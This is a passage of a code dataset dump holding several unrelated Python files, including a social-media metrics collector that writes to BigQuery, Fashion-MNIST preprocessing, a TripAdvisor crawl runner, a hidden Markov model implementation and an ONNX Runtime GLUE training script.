자동으로 시간별 데이터 쌓기 (기간 단위 = 5분으로 Test)\n###############################################################\nprint('Start Test & nohup out test', flush=True)\n\n# SETTING\ntest_term = 60*5 # term = seconds (test: 5분씩 갱신 -> 1주일씩 갱신하려면 test_term = 60*60*24*7)\nres_list = [\"Nando’s\", \"KFC\", \"Subway\", \"Burger King\",\"Pizza Hut\", \"Domino’s\", \"Carl’s JR.\", \"Green Burrito\",\n \"McDonald’s\", \"Dunkin’ Donuts\", \"Tacobell\", \"Auntie Anne’s\", \"Cinnabon\",\"Charleys Philly Steak\",\n \"Quiznos\", \"Nathan’s Famous\", \"Red Robin\", \"Gourmet Burgers and Brew\",\"Shake shack\",\n \"Five Guys\", \"Chipotle\", \"In-N-Out\", \"Jack in the box\"] #release(1) company list\n\n\n# Res name -> HASHTAG 때문에 특수문자 제거 필요\ntem_res_list = []\nfor i in res_list:\n tem = i.replace(\"\\'\",\"\")\n tem = tem.replace(\"’\",\"\")\n tem = tem.replace(\".\",\"\")\n tem = tem.replace(\",\",\"\")\n tem = tem.replace(\"-\",\"\")\n tem_res_list.append(tem)\n\nres_list = tem_res_list\nyoutube_id_list = youtube_id_mapping(res_list) # 각 식당에 대한 유튜브 id 맵핑\n\n\n# WHILE LOOP\ntest_count = 0 # Test시에는 무한루프가 최대 100번 돌도록 설정\ntest_limit = 100\n\nwhile(True):\n date_list = []\n name_list = []\n instagram_follow_count_list = []\n instagram_hashtag_count_list = []\n youtube_view_count_list = []\n youtube_comment_count_list = []\n youtube_subscriber_count_list = []\n youtube_video_count_list = []\n twitter_follower_count_list = []\n twitter_favorite_count_list = []\n twitter_friends_count_list = []\n twitter_listed_count_list = []\n\n if test_count == test_limit:\n print(\"FINISH\", flush = True)\n break\n test_count += 1\n \n time.sleep(test_term)\n time_key = datetime.datetime.now()\n\n for i in range(len(res_list)):\n time.sleep(60) # Twitter api -> call 당 time.sleep(60) 필요함\n tem_list = []\n try:\n insta_follower, insta_hashtag = instagram_api(res_list[i])\n except:\n insta_follower, insta_hashtag = 0,0\n\n try:\n twit_follower, twit_favorites, twit_friends, twit_listed = twitter_api(res_list[i])\n except:\n twit_follower, twit_favorites, twit_friends, twit_listed = 0,0,0,0\n\n try:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video =youtube_api(youtube_id_list[i])\n except:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video = 0,0,0,0\n \n date_list.append(time_key)\n\n\n #BIG QUERY에 쌓을 때 레스토랑 네임 -> 소문자, 공백제거로 통일\n res_name = str(res_list[i]).lower()\n res_name = res_name.replace(\" \",\"\")\n name_list.append(res_name)\n\n instagram_follow_count_list.append(insta_follower)\n instagram_hashtag_count_list.append(insta_hashtag)\n youtube_view_count_list.append(youtub_view)\n youtube_comment_count_list.append(youtub_comment)\n youtube_subscriber_count_list.append(youtub_subscriber)\n youtube_video_count_list.append(youtub_video)\n twitter_follower_count_list.append(twit_follower)\n twitter_favorite_count_list.append(twit_favorites)\n twitter_friends_count_list.append(twit_friends)\n twitter_listed_count_list.append(twit_listed)\n\n df = pandas.DataFrame({'date' : date_list, 'name' : name_list, 'instagram_follow_count' : instagram_follow_count_list,\n 'instagram_hashtag_count' : instagram_hashtag_count_list, 'youtube_view_count' : youtube_view_count_list,\n 'youtube_comment_count' : youtube_comment_count_list, 'youtube_subscriber_count' : youtube_subscriber_count_list,\n 'youtube_video_count' : youtube_video_count_list, 'twitter_follower_count' : twitter_follower_count_list,\n 'twitter_favorite_count' : twitter_favorite_count_list, 'twitter_friend_count' : twitter_friends_count_list,\n 'twitter_listed_count' : twitter_listed_count_list})\n\n pandas.DataFrame.to_gbq(df, 'SNS_data.last_test', 'datamingo', if_exists = 'append', chunksize = 10000, verbose = True)\n print(datetime.datetime.now(), 'big query update!', flush=True)","sub_path":"SNS_api/data_to_bigquery_server.py","file_name":"data_to_bigquery_server.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77357388","text":"num = (int(input('Digite um número: ')),\n int(input('Digite outro número: ')),\n int(input('Digite mais um número: ')),\n int(input('Digite o último número: ')))\npar = 0\nprint(f'Você digitou os valores: {num}')\nif 9 in num:\n print(f'O valor 9 apareceu {num.count(9)} vezes.')\nelse:\n print(f'O valor 9 não foi digitado')\nif 3 in num :\n print(f'O valor 3 apareceu na {num.index(3)+1}ª posição.')\nelse:\n print(f'O valor 3 não foi digitado.')\nfor i in num:\n if i % 2 == 0:\n par += 1\nprint(f'Os valores pares digitados foram {par}')\n","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6087205","text":"#Keras supplies many datasets in their library aptly named datasets\nfrom keras.datasets import fashion_mnist #https://keras.io/datasets/\n\n#We store the training and testing images in the following variables\n\n(train_X, train_Y), (test_X, test_Y) = fashion_mnist.load_data()\n\n\nimport numpy as np #for linear algebra\n\n#To see what dimensions I am working with:\nprint(\"Dimension of training input and output\")\nprint(train_X.shape, train_Y.shape)\n#(60000, 28, 28), (60000,)\nprint(\"Dimensions of test input and output\")\nprint(test_X.shape, test_Y.shape)\n#(10000, 28, 28), (10000,)\n\"\"\"\nSo training data is 60000 samples with each sample havinga 28x28 pixel dimension\nand the test data is 10000 samples with the same dimensions\n\nNext we find the number of unique labels in the output using numpy\n\"\"\"\nprint(\"Unique labels to classify and total number of unique lables \")\nprint(np.unique(train_Y), len(np.unique(train_Y)))\n#(array([0,1,2,3,4,5,6,7,8,9]), 10)\n\"\"\"\nThere are 10 total output labels ranging from 0 - 9\nNow we want to reshape the images into a matrix of 28x28x1 to feed the CNN\nand then normalize the data into a float format ranging from 0-1.\n\"\"\"\ntrain_X = train_X.reshape(-1, 28, 28, 1)\ntest_X = test_X.reshape(-1, 28, 28, 1)\n#Reshapes to ((60000, 28, 28, 1), (10000, 28, 28, 1))\n\ntrain_X = train_X.astype('float32')\ntest_X = test_X.astype('float32')\n\ntrain_X = train_X / 255.0\ntest_X = test_X / 255.0\n\n\"\"\"\nNow the NN is not going to understand the labels in the train_Y and test_Y\nthe way they are now, so we must transform the labels into a 'vector'\ni.e if the output label is 1, we want the vector to be [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\nand if the label is 9 -> [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n\"\"\"\nfrom keras.utils import to_categorical #https://keras.io/utils/\n#converts an array into a binary class matrix\ntrain_Y_binary = to_categorical(train_Y)\n#Converts all to the binary representation\ntest_Y_binary = to_categorical(test_Y)\n#both have size (N, 10) where N is number of samples - 60000 for train and 10000 for test\n\"\"\"\nAlways important in ML is splitting of the data into two parts, one for training and one for validation\nI choose a 80% to 20% split of training data to validate data respectively\nIn addition, we can randomize the data order with sklearns train_test_split\n\n\"\"\"\nfrom sklearn.model_selection import train_test_split #https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\ntrain_X,valid_X,train_label,valid_label = train_test_split(train_X, train_Y_binary, test_size=0.2, random_state=13)\n#train_X.shape: (48000, 28, 28, 1), valid_X.shape: (12000, 28, 28, 1), train_label.shape: (48000, 10), valid_label.shape: (12000, 10)\n#Now we are ready to use the data:\n","sub_path":"initial_data_analysis.py","file_name":"initial_data_analysis.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"524187988","text":"\"\"\"\nThis file reads city names from cities-queue.txt and starts running crawl from the top.\nAfter reading a city name it deletes the line. Hence, the next un-crawled city name comes to the top.\nSo, multiple instances of this script can be run at the same time to increase efficiency.\n\"\"\"\nimport json\nimport os\nfrom urllib.request import urlopen\nfrom general import append_to_file\n\nwith open('cities-queue.txt') as infile:\n characters = 0\n for line in infile:\n wordslist = line.split()\n characters += sum(len(word)+1 for word in wordslist)\n\n\nwhile True:\n city = None\n rf = open(\"run.py-offset-setter.txt\", \"r\")\n offset = int(rf.readline()[9:].strip())\n rf.close()\n\n if offset >= characters:\n break\n\n with open('cities-queue.txt', 'r+') as f:\n while True:\n f.seek(offset, 0)\n line = f.readline()\n offset = offset + len(line)\n\n rf = open(\"run.py-offset-setter.txt\", \"w\")\n rf.write(\"offset = \" + str(offset))\n rf.close()\n\n if not line or line == \"\\n\":\n continue\n\n if line.strip()[0] != \"#\":\n city = line.strip()\n break\n\n city_url_name = city.replace(\" \", \"%20\")\n \"\"\"\n Find document ID from url\n \"\"\"\n url = \"https://www.tripadvisor.in/TypeAheadJson?action=API&query=\" + city_url_name + \"&types=geo&name_\" \\\n \"depth=1&details=true&legacy_format=true&rescue=true&max=8&uiOrigin=Attractions_\" \\\n \"geopicker&source=Attractions_geopicker&searchSessionId=7B739CEC86558248C6D84290316117ED1575889411248ssid&\" \\\n \"scope=1&beforeGeoId=1&afterGeoId=1&startTime=1575892064630\"\n\n json_url = urlopen(url)\n data = json.loads(json_url.read())\n try:\n document_id = data[0].get(\"document_id\")\n except Exception as e:\n document_id = None\n if document_id is None or document_id.isdigit() is False:\n append_to_file(\"list-of-cities-not-found.txt\", city)\n print(\"document_id not found\")\n continue\n print(city + \": Document ID:\" + document_id)\n\n cmd = \"python tripadvis-crawl.py --city=\\\"\" + city + \"\\\" --id=\" + document_id\n os.system(cmd)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215083333","text":"#Change strings in multiple files \nimport sys\nimport time\n\nfilename=['enable_custom_list_machine.yml','disable_custom_list_machine.yml']\n\n### Backup \nfor i1 in range(len(filename)):\n f1=open(filename[i1],'r')\n m=f1.read()\n f_back=open(filename[i1]+time.strftime(\"_%Y\"),'w')\n for i2 in m:\n f_back.write(i2)\n \n n=len(m)\n for i4 in range(n): \n#Next statement checks 11 characters as we are searching for string 'are'\n if m[i4:i4+11]=='text_change':\n m_new=m.replace('text_change',sys.argv[1])\n d2=open(filename[i1],'w')\n for i5 in m_new:\n d2.write(i5)\n\n\n\n\n","sub_path":"zango/Notif_Auto2/replace_string.py","file_name":"replace_string.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309272409","text":"import numpy as np\nimport numpy.random as npr\n\nfrom scipy.special import logsumexp\n\nfrom sds_numpy.initial import CategoricalInitState\nfrom sds_numpy.transitions import StationaryTransition\nfrom sds_numpy.observations import GaussianObservation\n\nfrom sds_numpy.utils import ensure_args_are_viable_lists\nfrom sds_numpy.cython.hmm_cy import forward_cy, backward_cy\n\nfrom tqdm import trange\n\nto_c = lambda arr: np.copy(arr, 'C')\\\n if not arr.flags['C_CONTIGUOUS'] else arr\n\n\nclass HMM:\n\n def __init__(self, nb_states, dm_obs, dm_act=0,\n init_state_prior={}, trans_prior={}, obs_prior={},\n init_state_kwargs={}, trans_kwargs={}, obs_kwargs={}):\n\n self.nb_states = nb_states\n self.dm_obs = dm_obs\n self.dm_act = dm_act\n\n self.init_state = CategoricalInitState(self.nb_states, prior=init_state_prior, **init_state_kwargs)\n self.transitions = StationaryTransition(self.nb_states, prior=trans_prior, **trans_kwargs)\n self.observations = GaussianObservation(self.nb_states, self.dm_obs, self.dm_act,\n prior=obs_prior, **obs_kwargs)\n\n @property\n def params(self):\n return self.init_state.params, \\\n self.transitions.params, \\\n self.observations.params\n\n @params.setter\n def params(self, value):\n self.init_state.params = value[0]\n self.transitions.params = value[1]\n self.observations.params = value[2]\n\n @ensure_args_are_viable_lists\n def initialize(self, obs, act=None, **kwargs):\n self.init_state.initialize()\n if hasattr(self, 'init_observation'):\n self.init_observation.initialize(obs)\n self.transitions.initialize(obs, act)\n self.observations.initialize(obs, act)\n\n def permute(self, perm):\n self.init_state.permute(perm)\n self.transitions.permute(perm)\n self.observations.permute(perm)\n\n def log_priors(self):\n logprior = 0.0\n logprior += self.init_state.log_prior()\n logprior += self.transitions.log_prior()\n logprior += self.observations.log_prior()\n return logprior\n\n @ensure_args_are_viable_lists\n def log_likelihoods(self, obs, act=None):\n loginit = self.init_state.log_init()\n logtrans = self.transitions.log_transition(obs, act)\n logobs = self.observations.log_likelihood(obs, act)\n return loginit, logtrans, logobs\n\n def log_norm(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n _, norm = self.forward(*loglikhds)\n return np.sum(np.hstack(norm))\n\n def log_probability(self, obs, act=None):\n return self.log_norm(obs, act) + self.log_priors()\n\n def forward(self, loginit, logtrans, logobs, logctl=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n alpha, norm = [], []\n for _logobs, _logctl, _logtrans in zip(logobs, logctl, logtrans):\n T = _logobs.shape[0]\n _alpha = np.zeros((T, self.nb_states))\n _norm = np.zeros((T, ))\n\n if cython:\n forward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_alpha), to_c(_norm))\n else:\n for k in range(self.nb_states):\n _alpha[0, k] = loginit[k] + _logobs[0, k]\n _norm[0] = logsumexp(_alpha[0], axis=-1, keepdims=True)\n _alpha[0] = _alpha[0] - _norm[0]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(1, T):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _alpha[t - 1, j] + _logtrans[t - 1, j, k]\n _alpha[t, k] = logsumexp(_aux) + _logobs[t, k] + _logctl[t, k]\n\n _norm[t] = logsumexp(_alpha[t], axis=-1, keepdims=True)\n _alpha[t] = _alpha[t] - _norm[t]\n\n alpha.append(_alpha)\n norm.append(_norm)\n return alpha, norm\n\n def backward(self, loginit, logtrans, logobs,\n logctl=None, scale=None, cython=True):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n beta = []\n for _logobs, _logctl, _logtrans, _scale in zip(logobs, logctl, logtrans, scale):\n T = _logobs.shape[0]\n _beta = np.zeros((T, self.nb_states))\n\n if cython:\n backward_cy(to_c(loginit), to_c(_logtrans),\n to_c(_logobs), to_c(_logctl),\n to_c(_beta), to_c(_scale))\n else:\n for k in range(self.nb_states):\n _beta[T - 1, k] = 0.0 - _scale[T - 1]\n\n _aux = np.zeros((self.nb_states,))\n for t in range(T - 2, -1, -1):\n for k in range(self.nb_states):\n for j in range(self.nb_states):\n _aux[j] = _logtrans[t, k, j] + _beta[t + 1, j]\\\n + _logobs[t + 1, j] + _logctl[t + 1, j]\n _beta[t, k] = logsumexp(_aux) - _scale[t]\n\n beta.append(_beta)\n return beta\n\n def posterior(self, alpha, beta):\n return [np.exp(_alpha + _beta - logsumexp(_alpha + _beta, axis=1, keepdims=True))\n for _alpha, _beta in zip(alpha, beta)]\n\n def joint_posterior(self, alpha, beta, loginit, logtrans, logobs, logctl=None):\n if logctl is None:\n logctl = []\n for _logobs in logobs:\n logctl.append(np.zeros((_logobs.shape[0], self.nb_states)))\n\n zeta = []\n for _logobs, _logctl, _logtrans, _alpha, _beta in\\\n zip(logobs, logctl, logtrans, alpha, beta):\n _zeta = _alpha[:-1, :, None] + _beta[1:, None, :] + _logtrans\\\n + _logobs[1:, :][:, None, :] + _logctl[1:, :][:, None, :]\n\n _zeta -= _zeta.max((1, 2))[:, None, None]\n _zeta = np.exp(_zeta)\n _zeta /= _zeta.sum((1, 2))[:, None, None]\n\n zeta.append(_zeta)\n return zeta\n\n @ensure_args_are_viable_lists\n def viterbi(self, obs, act=None):\n loginit, logtrans, logobs = self.log_likelihoods(obs, act)[0:3]\n\n delta = []\n z = []\n for _logobs, _logtrans in zip(logobs, logtrans):\n T = _logobs.shape[0]\n\n _delta = np.zeros((T, self.nb_states))\n _args = np.zeros((T, self.nb_states), np.int64)\n _z = np.zeros((T, ), np.int64)\n\n for t in range(T - 2, -1, -1):\n _aux = _logtrans[t, :] + _delta[t + 1, :] + _logobs[t + 1, :]\n _delta[t, :] = np.max(_aux, axis=1)\n _args[t + 1, :] = np.argmax(_aux, axis=1)\n\n _z[0] = np.argmax(loginit + _delta[0, :] + _logobs[0, :], axis=0)\n for t in range(1, T):\n _z[t] = _args[t, _z[t - 1]]\n\n delta.append(_delta)\n z.append(_z)\n\n return delta, z\n\n def estep(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n zeta = self.joint_posterior(alpha, beta, *loglikhds)\n\n return gamma, zeta\n\n def mstep(self, gamma, zeta,\n obs, act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs, **kwargs):\n\n if hasattr(self, 'init_observation'):\n self.init_observation.mstep(gamma, obs)\n\n self.init_state.mstep(gamma, **init_mstep_kwargs)\n self.transitions.mstep(zeta, obs, act, **trans_mstep_kwargs)\n self.observations.mstep(gamma, obs, act, **obs_mstep_kwargs)\n\n @ensure_args_are_viable_lists\n def em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={},\n obs_mstep_kwargs={}, **kwargs):\n\n process_id = kwargs.get('process_id', 0)\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n pbar.set_description(\"#{}, ll: {:.5f}\".format(process_id, train_lls[-1]))\n\n if abs(train_ll - last_train_ll) < prec:\n break\n else:\n last_train_ll = train_ll\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def earlystop_em(self, train_obs, train_act=None, nb_iter=50, prec=1e-4,\n init_mstep_kwargs={}, trans_mstep_kwargs={}, obs_mstep_kwargs={},\n test_obs=None, test_act=None, **kwargs):\n\n assert test_obs is not None and test_act is not None\n\n process_id = kwargs.get('process_id', 0)\n\n nb_train = np.vstack(train_obs).shape[0]\n nb_test = np.vstack(test_obs).shape[0]\n nb_all = nb_train + nb_test\n\n train_lls = []\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n last_train_ll = train_ll\n\n test_lls = []\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n last_test_ll = test_ll\n\n all_ll = last_train_ll + last_test_ll\n\n score = (all_ll - train_ll) / (nb_all - nb_train)\n last_score = score\n\n pbar = trange(nb_iter, position=process_id)\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \" score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n for _ in pbar:\n gamma, zeta = self.estep(train_obs, train_act)\n self.mstep(gamma, zeta, train_obs, train_act,\n init_mstep_kwargs,\n trans_mstep_kwargs,\n obs_mstep_kwargs,\n **kwargs)\n\n train_ll = self.log_norm(train_obs, train_act)\n train_lls.append(train_ll)\n\n test_ll = self.log_norm(test_obs, test_act)\n test_lls.append(test_ll)\n\n all_ll = train_ll + test_ll\n score = (all_ll - train_ll) / (nb_all - nb_train)\n\n pbar.set_description(\"#{}, train_ll: {:.5f}, test_ll: {:.5f},\"\n \"score: {:.5f}\".format(process_id, train_ll, test_ll, score))\n\n if abs(score - last_score) < prec:\n break\n else:\n last_score = score\n\n return train_lls\n\n @ensure_args_are_viable_lists\n def mean_observation(self, obs, act=None):\n loglikhds = self.log_likelihoods(obs, act)\n alpha, norm = self.forward(*loglikhds)\n beta = self.backward(*loglikhds, scale=norm)\n gamma = self.posterior(alpha, beta)\n\n mean_obs = self.observations.smooth(gamma, obs, act)\n return mean_obs\n\n @ensure_args_are_viable_lists\n def filter(self, obs, act=None):\n logliklhds = self.log_likelihoods(obs, act)\n alpha, _ = self.forward(*logliklhds)\n belief = [np.exp(_alpha - logsumexp(_alpha, axis=1, keepdims=True))\n for _alpha in alpha]\n return belief\n\n def sample(self, act=None, horizon=None):\n state = []\n obs = []\n\n for n in range(len(horizon)):\n _act = np.zeros((horizon[n], self.dm_act)) if act is None else act[n]\n _obs = np.zeros((horizon[n], self.dm_obs))\n _state = np.zeros((horizon[n],), np.int64)\n\n _state[0] = self.init_state.sample()\n _obs[0, :] = self.observations.sample(_state[0])\n for t in range(1, horizon[n]):\n _state[t] = self.transitions.sample(_state[t - 1], _obs[t - 1, :], _act[t - 1, :])\n _obs[t, :] = self.observations.sample(_state[t], _obs[t - 1, :], _act[t - 1, :])\n\n state.append(_state)\n obs.append(_obs)\n\n return state, obs\n\n def step(self, obs, act, belief, stoch=True, average=False):\n if stoch:\n # it doesn't make sense to average while sampling\n assert not average\n\n if stoch:\n state = npr.choice(self.nb_states, p=belief)\n nxt_state = self.transitions.sample(state, obs, act)\n nxt_obs = self.observations.sample(nxt_state, obs, act)\n else:\n if average:\n nxt_state = None\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(obs, act)[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n _zeta = _trans.T @ belief\n _nxt_belief = _zeta / _zeta.sum()\n\n nxt_obs = np.zeros((1, self.dm_obs))\n for k in range(self.nb_states):\n nxt_obs += _nxt_belief[k] * self.observations.mean(k, obs, act)\n else:\n state = np.argmax(belief)\n nxt_state = self.transitions.likeliest(state, obs, act)\n nxt_obs = self.observations.mean(nxt_state, obs, act)\n\n return nxt_state, nxt_obs\n\n def forcast(self, hist_obs=None, hist_act=None, nxt_act=None,\n horizon=None, stoch=False, average=False):\n\n nxt_state = []\n nxt_obs = []\n\n for n in range(len(horizon)):\n _hist_obs = hist_obs[n]\n _hist_act = hist_act[n]\n\n _nxt_act = np.zeros((horizon[n], self.dm_act)) if nxt_act is None else nxt_act[n]\n _nxt_obs = np.zeros((horizon[n] + 1, self.dm_obs))\n _nxt_state = np.zeros((horizon[n] + 1,), np.int64)\n\n _belief = self.filter(_hist_obs, _hist_act)[0][-1, ...]\n\n if stoch:\n _nxt_state[0] = npr.choice(self.nb_states, p=_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.sample(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.sample(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n else:\n if average:\n # return empty discrete state when mixing\n _nxt_state = None\n\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n\n # average over transitions and belief space\n _logtrans = np.squeeze(self.transitions.log_transition(_nxt_obs[t, :], _nxt_act[t, :])[0])\n _trans = np.exp(_logtrans - logsumexp(_logtrans, axis=1, keepdims=True))\n\n # update belief\n _zeta = _trans.T @ _belief\n _belief = _zeta / _zeta.sum()\n\n # average observations\n for k in range(self.nb_states):\n _nxt_obs[t + 1, :] += _belief[k] * self.observations.mean(k, _nxt_obs[t, :], _nxt_act[t, :])\n else:\n _nxt_state[0] = np.argmax(_belief)\n _nxt_obs[0, :] = _hist_obs[-1, ...]\n for t in range(horizon[n]):\n _nxt_state[t + 1] = self.transitions.likeliest(_nxt_state[t], _nxt_obs[t, :], _nxt_act[t, :])\n _nxt_obs[t + 1, :] = self.observations.mean(_nxt_state[t + 1], _nxt_obs[t, :], _nxt_act[t, :])\n\n nxt_state.append(_nxt_state)\n nxt_obs.append(_nxt_obs)\n\n return nxt_state, nxt_obs\n\n @ensure_args_are_viable_lists\n def kstep_mse(self, obs, act, horizon=1, stoch=False, average=False):\n\n from sklearn.metrics import mean_squared_error,\\\n explained_variance_score, r2_score\n\n mse, smse, evar = [], [], []\n for _obs, _act in zip(obs, act):\n _hist_obs, _hist_act, _nxt_act = [], [], []\n _target, _prediction = [], []\n\n _nb_steps = _obs.shape[0] - horizon\n for t in range(_nb_steps):\n _hist_obs.append(_obs[:t + 1, :])\n _hist_act.append(_act[:t + 1, :])\n _nxt_act.append(_act[t: t + horizon, :])\n\n _hr = [horizon for _ in range(_nb_steps)]\n _, _forcast = self.forcast(hist_obs=_hist_obs, hist_act=_hist_act,\n nxt_act=_nxt_act, horizon=_hr, stoch=stoch,\n average=average)\n\n for t in range(_nb_steps):\n _target.append(_obs[t + horizon, :])\n _prediction.append(_forcast[t][-1, :])\n\n _target = np.vstack(_target)\n _prediction = np.vstack(_prediction)\n\n _mse = mean_squared_error(_target, _prediction)\n _smse = 1. - r2_score(_target, _prediction, multioutput='variance_weighted')\n _evar = explained_variance_score(_target, _prediction, multioutput='variance_weighted')\n\n mse.append(_mse)\n smse.append(_smse)\n evar.append(_evar)\n\n return np.mean(mse), np.mean(smse), np.mean(evar)\n","sub_path":"sds_numpy/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":17930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226295170","text":"# -------------------------------------------------------------------------\n# Portions Copyright (c) Microsoft Corporation. All rights reserved.\n# --------------------------------------------------------------------------\n# Copyright 2020 The HuggingFace Inc. team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport numpy as np\nimport mlflow\nimport time\nfrom typing import Dict, Callable\nimport json\nimport os\n\n# from dataclasses import dataclass, field\nimport transformers\nfrom transformers import (\n AutoModelForSequenceClassification,\n AutoTokenizer,\n EvalPrediction,\n Trainer,\n HfArgumentParser,\n TrainingArguments,\n)\nfrom glue_datasets import (\n load_encoded_glue_dataset,\n num_labels_from_task,\n load_metric_from_task,\n)\n\n# pretraining\nfrom transformers import AutoConfig\nfrom transformers import DataCollatorForLanguageModeling\n\n# Azure ML imports - could replace this with e.g. wandb or mlflow\nfrom transformers.integrations import MLflowCallback\n\n# Pytorch Profiler\nimport torch.profiler.profiler as profiler\nfrom transformers import TrainerCallback\n\n# Onnx Runtime for training\nfrom optimum.onnxruntime import ORTTrainer, ORTTrainingArguments\n\n\ndef construct_compute_metrics_function(task: str) -> Callable[[EvalPrediction], Dict]:\n metric = load_metric_from_task(task)\n\n if task != \"stsb\":\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = np.argmax(predictions, axis=1)\n return metric.compute(predictions=predictions, references=labels)\n\n else:\n\n def compute_metrics_function(eval_pred: EvalPrediction) -> Dict:\n predictions, labels = eval_pred\n predictions = predictions[:, 0]\n return metric.compute(predictions=predictions, references=labels)\n\n return compute_metrics_function\n\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser(ORTTrainingArguments)\n parser.add_argument(\"--task\", default=\"cola\", help=\"name of GLUE task to compute\")\n parser.add_argument(\"--model_checkpoint\", default=\"bert-large-uncased\")\n parser.add_argument(\"--tensorboard_log_dir\", default=\"/outputs/runs/\")\n\n training_args, args = parser.parse_args_into_dataclasses()\n\n transformers.logging.set_verbosity_debug()\n\n task: str = args.task.lower()\n\n num_labels = num_labels_from_task(task)\n\n tokenizer = AutoTokenizer.from_pretrained(args.model_checkpoint, use_fast=True)\n context_length = 512\n\n model_config = AutoConfig.from_pretrained(\n args.model_checkpoint,\n vocab_size=len(tokenizer),\n n_ctx=context_length,\n bos_token_id=tokenizer.bos_token_id,\n eos_token_id=tokenizer.eos_token_id,\n )\n model = AutoModelForSequenceClassification.from_config(model_config)\n\n encoded_dataset_train, encoded_dataset_eval = load_encoded_glue_dataset(\n task=task, tokenizer=tokenizer\n )\n\n compute_metrics = construct_compute_metrics_function(args.task)\n\n # Create path for logging to tensorboard\n my_logs = os.environ[\"PWD\"] + args.tensorboard_log_dir\n\n # Custom HuggingFace trainer callback used for starting/stopping the pytorch profiler\n class ProfilerCallback(TrainerCallback):\n def on_train_begin(self, args, state, control, model=None, **kwargs):\n self.prof = profiler.profile(\n schedule=profiler.schedule(wait=2, warmup=1, active=3, repeat=2),\n activities=[\n profiler.ProfilerActivity.CPU,\n profiler.ProfilerActivity.CUDA,\n ],\n on_trace_ready=profiler.tensorboard_trace_handler(my_logs),\n record_shapes=True,\n with_stack=True,\n profile_memory=True,\n )\n self.prof.start()\n\n def on_train_end(self, args, state, control, model=None, **kwargs):\n self.prof.stop()\n\n def on_step_begin(self, args, state, control, model=None, **kwargs):\n self.prof.step()\n\n # Initialize huggingface trainer. This trainer will internally execute the training loop\n trainer = ORTTrainer(\n model=model,\n args=training_args,\n train_dataset=encoded_dataset_train,\n eval_dataset=encoded_dataset_eval,\n # data_collator=data_collator,\n tokenizer=tokenizer,\n compute_metrics=compute_metrics,\n callbacks=[ProfilerCallback],\n feature=\"sequence-classification\",\n )\n\n trainer.pop_callback(MLflowCallback)\n\n start = time.time()\n\n # pretrian the model!\n result = trainer.train()\n\n print(f\"Time: {result.metrics['train_runtime']:.2f}\")\n print(f\"Samples/second: {result.metrics['train_samples_per_second']:.2f}\")\n print(\"Training...\")\n\n mlflow.log_metric(\n \"time/epoch\", (time.time() - start) / 60 / 